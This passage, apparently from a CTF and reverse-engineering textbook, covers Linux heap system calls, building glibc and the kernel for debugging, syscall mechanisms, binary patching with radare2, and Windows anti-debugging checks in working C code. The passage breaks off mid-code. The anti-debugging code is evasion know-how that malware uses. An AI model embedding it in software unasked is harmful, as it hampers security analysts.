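regions = [parse_maps_line(l) for l in sample.splitlines()]
data_end = regions[0][1]
heap_start, heap_end = regions[1][0], regions[1][1]

# With ASLR disabled the heap starts exactly where the data segment ends.
print(hex(data_end), hex(heap_start), hex(heap_end - heap_start))
```

To inspect a live process, the same function could be applied to each line read from /proc/PID/maps.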

Step 2, grow the heap with brk():

$ ./a.out
Current PID: 27759
Initial program break: 0x56579000

Program break after brk: 0x5657a000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-5657a000 rw-p 00000000 00:00 0                                  [heap]
...

The start of the heap is unchanged, and its end has grown to 0x5657a000.

Step 3, grow the heap with sbrk():

$ ./a.out
Current PID: 27759
Initial program break: 0x56579000

Program break after brk: 0x5657a000

sbrk return value (previous program break): 0x5657a000
Program break after sbrk: 0x5657b000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-5657b000 rw-p 00000000 00:00 0                                  [heap]
...

Step 4, shrink the heap:

$ ./a.out
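Current PID: 27759
Initial program break: 0x56579000

Program break after brk: 0x5657a000

sbrk return value (previous program break): 0x5657a000
Program break after sbrk: 0x5657b000

Program break restored to its initial value: 0x56579000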
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-56579000 rw-p 00000000 00:00 0                                  [heap]
...

Now let's look at the case with ASLR enabled:

# echo 2 > /proc/sys/kernel/randomize_va_space
$ ./a.out
Current PID: 28025
Initial program break: 0x578ad000
# cat /proc/28025/maps
...
5663f000-56640000 rw-p 00001000 08:01 28587506                           /home/a.out
5788c000-578ad000 rw-p 00000000 00:00 0                                  [heap]
...

This time the end of the data segment, 0x56640000, is not equal to the start of the heap, 0x5788c000.

mmap() is declared as follows:

#include <sys/mman.h>

void *mmap(void *addr, size_t len, int prot, int flags,
    int fildes, off_t off);

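mmap() creates a new virtual memory region and maps an object into it. When the region is not backed by a file it is called anonymous memory, and anonymous memory can serve as heap space. mmap() asks the kernel to create a new virtual memory region, preferably starting at address addr, and to map a contiguous chunk of the object identified by file descriptor fildes into that region. The chunk is len bytes long and starts off bytes from the beginning of the file. prot holds the access permission bits of the region, and flags holds bits describing the type of the mapped object.

munmap() removes a virtual memory region: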

#include <sys/mman.h>

int munmap(void *addr, size_t len);

Example source:

#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void) {
    printf("Current PID: %d\n", getpid());
    printf("After initialization\n");
    getchar();

    /* an anonymous mapping has no backing file; -1 is the portable fd value */
    char *addr = mmap(NULL, (size_t)4096, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("mmap done\n");
    getchar();

    munmap(addr, (size_t)4096);
    printf("munmap done\n");
    getchar();
    return 0;
}

Step 1, initialization:

$ ./a.out
Current PID: 28652
After initialization
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...

Step 2, mmap:

$ ./a.out
Current PID: 28652
After initialization
mmap done
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ee000-f76f1000 rw-p 00000000 00:00 0
...

Step 3, munmap:

$ ./a.out
Current PID: 28652
After initialization
mmap done
munmap done
# cat /proc/28652/maps
...
f76b2000-f76b5000 rw-p 00000000 00:00 0
f76ef000-f76f1000 rw-p 00000000 00:00 0
...

The start address in the second row changes f76ef000 -> f76ee000 -> f76ef000, and 0xf76ef000 - 0xf76ee000 = 0x1000 = 4096.
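The same map and unmap cycle can be tried from Python, whose standard mmap module wraps the system call. This is only a sketch: passing -1 as the file descriptor requests an anonymous mapping, and on Unix the module defaults to a shared mapping rather than the MAP_PRIVATE used in the C example.

```python
import mmap

PAGE = 4096

# One anonymous page: fileno -1 means there is no backing file.
region = mmap.mmap(-1, PAGE)
region[:5] = b"hello"          # the page is readable and writable
first = bytes(region[:5])
size = len(region)
region.close()                 # releases the mapping (munmap)

# The address arithmetic from the maps output above.
delta = 0xf76ef000 - 0xf76ee000
print(size, first, hex(delta))
```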

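Normally we do not call brk() or mmap() directly to allocate heap space. The C standard library provides an allocator called malloc, and programs allocate blocks from the heap by calling malloc(). The declarations are: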

#include <stdlib.h>

void *malloc(size_t size);
void free(void *ptr);
void *calloc(size_t nmemb, size_t size);
void *realloc(void *ptr, size_t size);

Example:

#include <stdio.h>
#include <stdlib.h>

void foo(int n) {
    int *p;
    p = (int *)malloc(n * sizeof(int));   /* n ints on the heap */

    for (int i=0; i<n; i++) {
        p[i] = i;
        printf("%d ", p[i]);
    }
    printf("\n");

    free(p);
}

int main(void) {
    int n;
    if (scanf("%d", &n) != 1)
        return 1;

    foo(n);
    return 0;
}

Output:

$ ./malloc
4
0 1 2 3
$ ./malloc
8
0 1 2 3 4 5 6 7
$ ./malloc
16
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

Disassembly as shown by gdb:

gdb-peda$ disassemble foo
Dump of assembler code for function foo:
   0x0000066d <+0>:     push   ebp
   0x0000066e <+1>:     mov    ebp,esp
   0x00000670 <+3>:     push   ebx
   0x00000671 <+4>:     sub    esp,0x14
   0x00000674 <+7>:     call   0x570 <__x86.get_pc_thunk.bx>
   0x00000679 <+12>:    add    ebx,0x1987
   0x0000067f <+18>:    mov    eax,DWORD PTR [ebp+0x8]
   0x00000682 <+21>:    shl    eax,0x2
   0x00000685 <+24>:    sub    esp,0xc
   0x00000688 <+27>:    push   eax
   0x00000689 <+28>:    call   0x4e0 <malloc@plt>
   0x0000068e <+33>:    add    esp,0x10
   0x00000691 <+36>:    mov    DWORD PTR [ebp-0xc],eax
   0x00000694 <+39>:    mov    DWORD PTR [ebp-0x10],0x0
   0x0000069b <+46>:    jmp    0x6d9 <foo+108>
   0x0000069d <+48>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006a0 <+51>:    lea    edx,[eax*4+0x0]
   0x000006a7 <+58>:    mov    eax,DWORD PTR [ebp-0xc]
   0x000006aa <+61>:    add    edx,eax
   0x000006ac <+63>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006af <+66>:    mov    DWORD PTR [edx],eax
   0x000006b1 <+68>:    mov    eax,DWORD PTR [ebp-0x10]
   0x000006b4 <+71>:    lea    edx,[eax*4+0x0]
   0x000006bb <+78>:    mov    eax,DWORD PTR [ebp-0xc]
   0x000006be <+81>:    add    eax,edx
   0x000006c0 <+83>:    mov    eax,DWORD PTR [eax]
   0x000006c2 <+85>:    sub    esp,0x8
   0x000006c5 <+88>:    push   eax
   0x000006c6 <+89>:    lea    eax,[ebx-0x17e0]
   0x000006cc <+95>:    push   eax
   0x000006cd <+96>:    call   0x4b0 <printf@plt>
   0x000006d2 <+101>:   add    esp,0x10
   0x000006d5 <+104>:   add    DWORD PTR [ebp-0x10],0x1
   0x000006d9 <+108>:   mov    eax,DWORD PTR [ebp-0x10]
   0x000006dc <+111>:   cmp    eax,DWORD PTR [ebp+0x8]
   0x000006df <+114>:   jl     0x69d <foo+48>
   0x000006e1 <+116>:   sub    esp,0xc
   0x000006e4 <+119>:   push   0xa
   0x000006e6 <+121>:   call   0x500 <putchar@plt>
   0x000006eb <+126>:   add    esp,0x10
   0x000006ee <+129>:   sub    esp,0xc
   0x000006f1 <+132>:   push   DWORD PTR [ebp-0xc]
   0x000006f4 <+135>:   call   0x4c0 <free@plt>
   0x000006f9 <+140>:   add    esp,0x10
   0x000006fc <+143>:   nop
   0x000006fd <+144>:   mov    ebx,DWORD PTR [ebp-0x4]
   0x00000700 <+147>:   leave  
   0x00000701 <+148>:   ret
End of assembler dump.

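The malloc implementation in glibc is an important topic, and we cover it in detail in a later chapter.

glibc malloc

Download files

glibc

In this chapter we read and analyze the glibc source code. First download it and switch to the version we need: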

$ git clone git://sourceware.org/git/glibc.git
$ cd glibc
$ git checkout --track -b local_glibc-2.23 origin/release/2.23/master

Next we build it. First edit the configuration file Makeconfig and comment out -Werror, so that newer GCC versions (such as v8.1.0) do not treat warnings as errors:

$ cat Makeconfig | grep -i werror | grep warn
+gccwarn += #-Werror

Next, apply a patch:

$ cat regexp.patch
diff --git a/misc/regexp.c b/misc/regexp.c
index 19d76c0..9017bc1 100644
--- a/misc/regexp.c
+++ b/misc/regexp.c
@@ -29,14 +29,17 @@

 #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_23)

-/* Define the variables used for the interface.  */
-char *loc1;
-char *loc2;
+#include <stdlib.h>    /* Get NULL.  */
+
+/* Define the variables used for the interface.  Avoid .symver on common
+   symbol, which just creates a new common symbol, not an alias.  */
+char *loc1 = NULL;
+char *loc2 = NULL;
 compat_symbol (libc, loc1, loc1, GLIBC_2_0);
 compat_symbol (libc, loc2, loc2, GLIBC_2_0);

 /* Although we do not support the use we define this variable as well.  */
-char *locs;
+char *locs = NULL;
 compat_symbol (libc, locs, locs, GLIBC_2_0);
$ patch misc/regexp.c regexp.patch

Now we can build:

$ mkdir build && cd build
$ ../configure --prefix=/usr/local/glibc-2.23
$ make -j4 && sudo make install

To link a program against a specific libc at compile time, do this:

$ gcc -L/usr/local/glibc-2.23/lib -Wl,--rpath=/usr/local/glibc-2.23/lib -Wl,-I/usr/local/glibc-2.23/lib/ld-2.23.so test.c
$ ldd a.out
        linux-vdso.so.1 (0x00007ffcc76b0000)
        libc.so.6 => /usr/local/glibc-2.23/lib/libc.so.6 (0x00007f6abd578000)
        /usr/local/glibc-2.23/lib/ld-2.23.so => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f6abdb1c000)

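To point gdb at the libc source files while debugging, you can use the gdb command directory. Its drawback is that it does not search subdirectories, so we recommend loading the directories at startup with the following command: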

gdb `find ~/path/to/glibc/source -type d -printf '-d %p '` ./a.out

malloc.c

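We first analyze the source of glibc 2.23, which is the default version on Ubuntu 16.04 and the most common one in pwn challenges. After that we look at the exploit mitigations added in newer glibc versions.

Allocation Function

_int_malloc()

Free Function

_int_free()

Reallocation Function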

_int_realloc()

Linux Kernel

Building and Installing

My build environment is shown below. First install the required software:

$ uname -a
Linux firmy-pc 4.14.34-1-MANJARO #1 SMP PREEMPT Thu Apr 12 17:26:43 UTC 2018 x86_64 GNU/Linux
$ yaourt -S base-devel

To make studying easier, pick a stable release, for example 4.16.3, the latest at the time of writing.

$ mkdir ~/kernelbuild && cd ~/kernelbuild
$ wget -c https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-4.16.3.tar.xz
$ tar -xvJf linux-4.16.3.tar.xz
$ cd linux-4.16.3/
$ make clean && make mrproper

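Kernel configuration options live in the .config file. There are two ways to set them. One is to start from the configuration of the currently running kernel: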

$ zcat /proc/config.gz > .config
$ make oldconfig

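The other is to generate a configuration yourself:

$ make localmodconfig   # based on the current config and the loaded modules
    # OR
$ make defconfig        # default config for the current architecture

To be able to debug the kernel, set the following options: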

CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_INFO_REDUCED=n
CONFIG_GDB_SCRIPTS=y

To use kgdb, also enable the following options:

CONFIG_STRICT_KERNEL_RWX=n
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y

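CONFIG_STRICT_KERNEL_RWX marks certain kernel memory regions as read-only, which prevents you from using software breakpoints, so it is best turned off. To use kdb, add the following on top of the options above: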

CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y

If you do not want KASLR to get in the way while debugging, you can disable it at build time:

CONFIG_RANDOMIZE_BASE=n
CONFIG_RANDOMIZE_MEMORY=n

Write the options above to a file named .config-fragment, then merge it into .config:

$ ./scripts/kconfig/merge_config.sh .config .config-fragment

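Finally, kernel builds enable -O2 optimization by default. You can edit the Makefile to use -O0 instead, but be aware that the kernel may fail to build with optimization turned off: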

KBUILD_CFLAGS   += -O0

Build the kernel:

$ make

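The next step would normally be installation, but we do not actually want to replace the kernel of the host machine, so the rest of the process is left to QEMU (see Section 4.1).

System Calls

In Linux, system calls are kernel-space functions and the only means by which user space can access the kernel. These functions depend on the CPU architecture: x86-64 provides 322 system calls and x86 provides 358 (see Appendix 9.4).

Here is an example written in 32-bit assembly. Source: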

.data

msg:
    .ascii "hello 32-bit!\n"
    len = . - msg

.text
    .global _start

_start:
    movl $len, %edx
    movl $msg, %ecx
    movl $1, %ebx
    movl $4, %eax
    int $0x80

    movl $0, %ebx
    movl $1, %eax
    int $0x80

Assemble and run (this code can also be built as a 64-bit program):

$ gcc -m32 -c hello32.S
$ ld -m elf_i386 -o hello32 hello32.o
$ strace ./hello32
execve("./hello32", ["./hello32"], 0x7ffff990f830 /* 68 vars */) = 0
strace: [ Process PID=19355 runs in 32 bit mode. ]
write(1, "hello 32-bit!\n", 14hello 32-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

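As shown, the program places the system call number in eax and invokes the system call with int $0x80.

The int 0x80 software interrupt is the classic mechanism, and kernels up to and including the early 2.6 series used it for system calls. Because it performs poorly, later kernels replaced it with fast system call instructions: 32-bit systems use sysenter (paired with sysexit), and 64-bit systems use syscall (paired with sysret).

An example using sysenter: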

.data

msg:
    .ascii "Hello sysenter!\n"
    len = . - msg

.text
    .globl _start

_start:
    movl $len, %edx
    movl $msg, %ecx
    movl $1, %ebx
    movl $4, %eax
    # Set up the stack for sysenter
    pushl $sysenter_ret
    pushl %ecx
    pushl %edx
    pushl %ebp
    movl %esp, %ebp
    sysenter

sysenter_ret:
    movl $0, %ebx
    movl $1, %eax
    # Set up the stack for sysenter
    pushl $sysenter_ret
    pushl %ecx
    pushl %edx
    pushl %ebp
    movl %esp, %ebp
    sysenter

$ gcc -m32 -c sysenter.S
$ ld -m elf_i386 -o sysenter sysenter.o
$ strace ./sysenter
execve("./sysenter", ["./sysenter"], 0x7fff73993fd0 /* 69 vars */) = 0
strace: [ Process PID=7663 runs in 32 bit mode. ]
write(1, "Hello sysenter!\n", 16Hello sysenter!
)       = 16
exit(0)                                 = ?
+++ exited with 0 +++

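As shown, using the sysenter instruction requires laying out the stack by hand. This is because when sysenter returns, execution resumes in the second half of __kernel_vsyscall (starting at 0xf7fd5059):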

gdb-peda$ vmmap vdso
Start      End        Perm      Name
0xf7fd4000 0xf7fd6000 r-xp      [vdso]
gdb-peda$ disassemble __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
   0xf7fd5050 <+0>:     push   ecx
   0xf7fd5051 <+1>:     push   edx
   0xf7fd5052 <+2>:     push   ebp
   0xf7fd5053 <+3>:     mov    ebp,esp
   0xf7fd5055 <+5>:     sysenter
   0xf7fd5057 <+7>:     int    0x80
   0xf7fd5059 <+9>:     pop    ebp
   0xf7fd505a <+10>:    pop    edx
   0xf7fd505b <+11>:    pop    ecx
   0xf7fd505c <+12>:    ret
End of assembler dump.

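__kernel_vsyscall wraps the sysenter calling convention and is part of the vDSO, which lets a program execute kernel-provided code in user space. The vDSO is covered in detail in a later chapter.

Here is a 64-bit example using syscall: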

.data

msg:
    .ascii "Hello 64-bit!\n"
    len = . - msg

.text
    .global _start

_start:
    movq  $1, %rdi
    movq  $msg, %rsi
    movq  $len, %rdx
    movq  $1, %rax
    syscall

    xorq  %rdi, %rdi
    movq  $60, %rax
    syscall

Assemble and run (this code cannot be built as a 32-bit program):

$ gcc -c hello64.S
$ ld -o hello64 hello64.o
$ strace ./hello64
execve("./hello64", ["./hello64"], 0x7ffe11485290 /* 68 vars */) = 0
write(1, "Hello 64-bit!\n", 14Hello 64-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

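In these examples we invoked the write and exit system calls directly (the execve in the strace output comes from launching the program). In general, though, applications are written against an application programming interface (API) implemented in user space rather than against system calls. For example, a call to printf() proceeds like this:

call printf() ==> printf() in the C library ==> write() in the C library ==> write() system call

Patching Binaries

What Is Patching

Often we cannot obtain a program's source code and can only modify the binary directly. This is what we call patching. You can edit the bytes of the file with a hex editor, or use semi-automated tools.

Patching takes many forms:

Patching a binary file (a program or a library)
Patching in memory (using a debugger)
Preloading a library to replace functions in the original library
Triggers (hook, then patch at run time)

Manual Patching

Manual patching is naturally more tedious, but it gives us a better understanding of how a binary is put together and how programs are linked and loaded. Many tools can do it, such as xxd, dd, gdb and radare2.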

xxd

$ echo 01: 01 02 03 04 05 06 07 08 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 04 05 06 07 08                       .........
$ echo 04: 41 42 43 44 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 41 42 43 44 08                       ....ABCD.

The -r option converts a hexdump back to binary. Here we first create a binary file and then change a few of its bytes.
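What xxd -r does in the two commands above can be mimicked in a few lines of Python. This is a rough sketch of the idea (write bytes at an offset, padding with zeros if needed), not a reimplementation of xxd; the helper name `patch_bytes` is made up.

```python
def patch_bytes(data, offset, new):
    """Return a copy of data with new written at offset,
    zero-padding the buffer if it is too short."""
    buf = bytearray(data)
    end = offset + len(new)
    if end > len(buf):
        buf.extend(b"\x00" * (end - len(buf)))
    buf[offset:end] = new
    return bytes(buf)


# Step 1: write 01..08 at offset 1 of an empty file.
image = patch_bytes(b"", 1, bytes(range(1, 9)))
# Step 2: overwrite four bytes at offset 4 with "ABCD".
patched = patch_bytes(image, 4, b"ABCD")

print(image.hex())
print(patched.hex())
```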

radare2

A simple example:

#include<stdio.h>
void main() {
    printf("hello");
    puts("world");
}

$ gcc -no-pie patch.c
$ ./a.out
helloworld

Next, by computing function offsets, we replace printf with puts:

[0x004004e0]> pdf @ main
            ;-- main:
/ (fcn) sym.main 36
|   sym.main ();
|              ; DATA XREF from 0x004004fd (entry0)
|           0x004005ca      55             push rbp
|           0x004005cb      4889e5         mov rbp, rsp
|           0x004005ce      488d3d9f0000.  lea rdi, str.hello          ; 0x400674 ; "hello"
|           0x004005d5      b800000000     mov eax, 0
|           0x004005da      e8f1feffff     call sym.imp.printf         ; int printf(const char *format)
|           0x004005df      488d3d940000.  lea rdi, str.world          ; 0x40067a ; "world"
|           0x004005e6      e8d5feffff     call sym.imp.puts           ; sym.imp.printf-0x10 ; int printf(const char *format)
|           0x004005eb      90             nop
|           0x004005ec      5d             pop rbp
\           0x004005ed      c3             ret

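The instruction at 0x004005da is call sym.imp.printf. The opcode byte e8 encodes call, and the four bytes that follow are a little-endian offset relative to the next instruction, so the offset to sym.imp.printf is 0xfffffef1. The instruction at 0x004005e6 is call sym.imp.puts, and the offset to sym.imp.puts is 0xfffffed5.

Next, find the PLT addresses of the two functions: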

[0x004004e0]> is~printf
vaddr=0x004004d0 paddr=0x000004d0 ord=003 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.printf
[0x004004e0]> is~puts
vaddr=0x004004c0 paddr=0x000004c0 ord=002 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.puts

Compute the distance between them:

[0x004004e0]> ?v 0x004004d0-0x004004c0
0x10

So to replace printf with puts, we only need to change the offset to 0xfffffef1 - 0x10 = 0xfffffee1.
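The offset arithmetic can be double-checked with a short Python sketch. It assumes the usual x86 encoding of a near call: opcode e8 followed by a 32-bit little-endian displacement measured from the address of the next instruction (the call itself is 5 bytes long). The function name `encode_call` is hypothetical; the addresses are the ones from the radare2 output above.

```python
import struct


def encode_call(call_addr, target):
    """Encode `call target` placed at call_addr as e8 + rel32."""
    rel32 = (target - (call_addr + 5)) & 0xFFFFFFFF
    return b"\xe8" + struct.pack("<I", rel32)


PRINTF_PLT = 0x004004d0
PUTS_PLT = 0x004004c0

original = encode_call(0x004005da, PRINTF_PLT)
patched = encode_call(0x004005da, PUTS_PLT)
print(original.hex(), patched.hex())
```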

[0x004004e0]> s 0x004005da
[0x004005da]> wx e8e1feffff
[0x004005da]> pd 1
|           0x004005da      e8e1feffff     call sym.imp.puts           ; sym.imp.printf-0x10 ; int printf(const char *format)

Done.

$ ./a.out
hello
world

This can be simplified even further: type the assembly directly and r2 takes care of the rest:

[0x004005da]> wa call 0x004004c0
Written 5 bytes (call 0x004004c0) = wx e8e1feffff
[0x004005da]> wa call sym.imp.puts
Written 5 bytes (call sym.imp.puts) = wx e8e1feffff

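Patching with Tools

patchkit

patchkit lets us patch ELF binaries with Python scripts.

Anti-Debugging Techniques

What Is Anti-Debugging

Anti-debugging is an important software protection technique, valued especially in game protection. Malware also frequently uses anti-debugging to resist security analysis. When a program detects that it may be running under a debugger, it may change its normal execution path or modify itself so that it crashes, which increases the time and complexity of debugging.

Anti-Debugging Techniques

We start with several anti-debugging methods on Windows.

Function-Based Detection

Function-based detection uses documented or undocumented Windows functions to check directly whether the program is being debugged. The simplest debugger detection function is IsDebuggerPresent():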

BOOL WINAPI IsDebuggerPresent(void);

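This function reads the BeingDebugged flag in the Process Environment Block (PEB). It returns a nonzero value if the process is running in the context of a debugger, and zero otherwise.

Example: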

BOOL CheckDebug()  
{  
    return IsDebuggerPresent();  
}

CheckRemoteDebuggerPresent() checks whether the specified process is being debugged:

BOOL WINAPI CheckRemoteDebuggerPresent(
  _In_    HANDLE hProcess,
  _Inout_ PBOOL  pbDebuggerPresent
);

If the process identified by the hProcess handle is being debugged, the variable pointed to by pbDebuggerPresent is set to TRUE; otherwise it is set to FALSE.

BOOL CheckDebug()  
{  
    BOOL ret;  
    CheckRemoteDebuggerPresent(GetCurrentProcess(), &ret);  
    return ret;  
}

NtQueryInformationProcess retrieves information about a given process:

NTSTATUS WINAPI NtQueryInformationProcess(
  _In_      HANDLE           ProcessHandle,
  _In_      PROCESSINFOCLASS ProcessInformationClass,
  _Out_     PVOID            ProcessInformation,
  _In_      ULONG            ProcessInformationLength,
  _Out_opt_ PULONG           ReturnLength
);

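The second parameter, ProcessInformationClass, selects the kind of process information to query. When it is 0 (ProcessBasicInformation) or 7 (ProcessDebugPort), debugging-related information can be obtained, and the result is written to the buffer pointed to by the third parameter, ProcessInformation.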

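Example:

/* Function pointer type for NtQueryInformationProcess, resolved at run time */
typedef NTSTATUS (WINAPI *NtQueryInformationProcessPtr)(HANDLE, UINT, PVOID, ULONG, PULONG);

BOOL CheckDebug()
{
    DWORD_PTR dbgPort = 0;
    HMODULE hModule = LoadLibraryA("Ntdll.dll");
    NtQueryInformationProcessPtr NtQueryInformationProcess = (NtQueryInformationProcessPtr)GetProcAddress(hModule, "NtQueryInformationProcess");
    /* 7 = ProcessDebugPort; a nonzero port means a debugger is attached */
    NtQueryInformationProcess(GetCurrentProcess(), 7, &dbgPort, sizeof(dbgPort), NULL);
    return dbgPort != 0;
}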

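Data-Based Detection

Data-based detection means the program tests data at key debugging-related locations to decide whether it is being debugged, for example the BeingDebugged field in the PEB mentioned above. The program locates these addresses and tests the data directly, which avoids function calls and makes its behavior stealthier.

Example:

BOOL CheckDebug()
{
    int BeingDebug = 0;
    __asm
    {
        mov eax, dword ptr fs:[18h]   ; eax = TEB (self pointer)
        mov eax, dword ptr [eax+030h] ; eax = PEB base address
        movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
        mov BeingDebug, eax
    }
    return BeingDebug != 0;
}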

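A process started under a debugger creates its heaps somewhat differently from a normally started process, and the system uses an undocumented field at offset 0x68 of the PEB structure (NtGlobalFlag) to decide how to create the heap structures. If the value at this location is 0x70, the process is running under a debugger.

Example: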

BOOL CheckDebug()
{
    int BeingDbg = 0;
    __asm
    {
        mov eax, dword ptr fs:[30h]
        mov eax, dword ptr [eax + 68h]
        and eax, 0x70
        mov BeingDbg, eax
    }
    return BeingDbg != 0;
}

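Symbolic-Link Detection

Symbolic-link detection targets debuggers and monitors that use a driver. After starting, such a tool creates a symbolic link for its driver so that user-mode code can communicate with the driver. Because these names are usually fixed, they can be used to determine whether the corresponding debugging software is present.

Example:

BOOL CheckDebug()
{
    HANDLE hDevice = CreateFileA("\\\\.\\PROCEXP153", GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
    /* CreateFileA returns INVALID_HANDLE_VALUE, not NULL, on failure */
    if (hDevice != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hDevice);
        return 0;   /* device exists: monitoring tool detected */
    }
    return 1;       /* not detected */
}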

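Window Detection

Window detection checks whether a specific debugger window exists on the current desktop. It can tell that a debugger is running, but not whether that debugger is debugging this program.

Example:

BOOL CheckDebug()
{
    if (FindWindowA("OllyDbg", 0))
    {
        return 0;   /* debugger window found */
    }
    return 1;       /* not found */
}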

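Signature Detection

Signature detection enumerates the running processes and searches each process's memory for byte sequences characteristic of a particular debugger.

For example, OllyDbg contains this signature: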

0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00
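It helps to see what these bytes actually are. Decoding them as UTF-16LE in Python (a quick sketch for illustration only) shows that the signature is simply two wide strings from the debugger's user interface.

```python
sign = bytes([
    0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
    0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
    0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
    0x4b, 0x00, 0x00, 0x00,
])

# Windows wide strings are UTF-16LE, each terminated by a 16-bit NUL.
text = sign.decode("utf-16-le")
strings = [s for s in text.split("\x00") if s]
print(strings)
```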

Example:

BOOL CheckDebug()
{
    BYTE sign[] = {0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
                0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
                0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
                0x4b, 0x00, 0x00, 0x00};

    PROCESSENTRY32 sentry32 = {0};
    sentry32.dwSize = sizeof(sentry32);
    HANDLE phsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    Process32First(phsnap, &sentry32);
    do {
        HANDLE hps = OpenProcess(MAXIMUM_ALLOWED, FALSE, sentry32.th32ProcessID);
        if (hps != 0)
        {
            DWORD szReaded = 0;
            BYTE signRemote[sizeof(sign)];
            /* read the bytes at the fixed address where the signature is expected */
            ReadProcessMemory(hps, (LPCVOID)0x4f632a, signRemote, sizeof(signRemote), &szReaded);
            if (szReaded > 0 && memcmp(sign, signRemote, sizeof(sign)) == 0)
            {
                CloseHandle(hps);
                CloseHandle(phsnap);
                return 0;   /* signature matched: debugger detected */
            }
            CloseHandle(hps);
        }
        sentry32.dwSize = sizeof(sentry32);
    } while (Process32Next(phsnap, &sentry32));

    CloseHandle(phsnap);
    return 1;               /* not detected */
}

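Behavior Detection

Behavior detection means the program uses code to sense the differences between running under a debugger and running normally. For example, stepping over two instructions in a debugger takes far longer than the CPU normally needs to execute them, so the rdtsc instruction can be used to test for this. (rdtsc reads the time-stamp counter into the EDX:EAX registers.)

Example: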

BOOL CheckDebug()
{
    int BeingDbg = 0;
    __asm
    {
        rdtsc
        mov ecx, edx
        rdtsc
        sub edx, ecx
        mov BeingDbg, edx
    }
    if (BeingDbg > 2)
    {
        return 0;   /* too much time elapsed: probably being single-stepped */
    }
    return 1;
}

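Breakpoint Detection

Breakpoint detection relies on how debuggers set breakpoints to check whether breakpoints have been placed in the program's code. Debuggers generally set code breakpoints in one of two ways:

By replacing an instruction with INT3 (opcode 0xCC), which triggers a software exception
By setting a hardware breakpoint through the hardware debug registers

For software breakpoints, the detection code scans the important code regions for unexpected INT3 instructions.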
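The scanning idea can be shown on a plain byte buffer in Python. This is a simplified sketch: the sample bytes are a hand-assembled 32-bit function body chosen for illustration, and a real scanner has to cope with 0xCC bytes that legitimately occur as operands or padding.

```python
def find_int3(code):
    """Return the offsets of every 0xCC byte in a code buffer."""
    return [i for i, b in enumerate(code) if b == 0xCC]


# push ebp; mov ebp,esp; sub esp,0x10; leave; ret
clean = bytes.fromhex("5589e583ec10c9c3")

# A debugger sets a software breakpoint by overwriting the first
# byte of an instruction (here: sub esp,0x10 at offset 3) with 0xCC.
patched = bytearray(clean)
patched[3] = 0xCC

print(find_int3(clean), find_int3(bytes(patched)))
```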

Example:

BOOL CheckDebug()
{
    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS32 pNtHeaders;
    PIMAGE_SECTION_HEADER pSectionHeader;
    DWORD dwBaseImage = (DWORD)GetModuleHandle(NULL);
    pDosHeader = (PIMAGE_DOS_HEADER)dwBaseImage;
    pNtHeaders = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader + pDosHeader->e_lfanew);
    pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(pNtHeaders->Signature) + sizeof(IMAGE_FILE_HEADER) +
                     (WORD)pNtHeaders->FileHeader.SizeOfOptionalHeader);
    DWORD dwAddr = pSectionHeader->VirtualAddress + dwBaseImage;
    DWORD dwCodeSize = pSectionHeader->SizeOfRawData;
    BOOL Found = FALSE;
    __asm
    {
        cld
        mov     edi,dwAddr
        mov     ecx,dwCodeSize
        mov     al,0CCH
        repne   scasb   ; search the ECX-byte buffer at EDI for the byte in AL
        jnz     NotFound
        mov Found,1
NotFound:
    }
    return Found;
}

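For hardware breakpoints, the program runs in protected mode and cannot read the debug registers directly, so the values of the DR registers are usually obtained by setting up an exception handler and reading the saved context. The example here reads them from the thread context instead.

Example: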

BOOL CheckDebug()
{
    CONTEXT context;  
    HANDLE hThread = GetCurrentThread();  
    context.ContextFlags = CONTEXT_DEBUG_REGISTERS;  
    GetThreadContext(hThread, &context);  
    if (context.Dr0 != 0 || context.Dr1 != 0 || context.Dr2 != 0 || context.Dr3!=0)
    {  
